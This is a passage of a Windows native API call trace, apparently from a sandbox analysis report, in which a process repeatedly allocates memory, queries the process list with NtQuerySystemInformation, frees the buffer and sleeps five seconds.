BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.415] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.415] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.428] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.428] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.428] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.430] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.430] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.444] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.444] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.447] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.459] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.459] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.460] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.460] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.463] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.464] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.474] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.475] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.475] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.477] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.478] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.490] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.490] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.491] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.491] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.491] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.495] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.516] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.516] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.517] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.517] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.520] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.520] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.521] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.521] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.522] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.522] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.524] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.524] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.537] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.537] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.538] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.538] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.538] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.541] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.552] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.552] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.553] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.553] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.555] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.569] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.569] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.576] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.577] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.583] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.584] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.584] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.586] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.586] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.599] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.600] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.600] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.601] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.605] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.616] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.616] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.617] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.618] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.619] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.630] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.631] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.631] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.634] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.634] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.646] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.647] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.647] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.651] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.661] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.662] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.664] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.664] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.677] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.677] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.678] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.678] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.681] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.682] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.694] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.696] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.697] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.708] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.709] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.709] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.710] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.712] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.712] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.725] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.726] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.727] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.731] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.732] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.740] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.741] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.741] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.743] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, 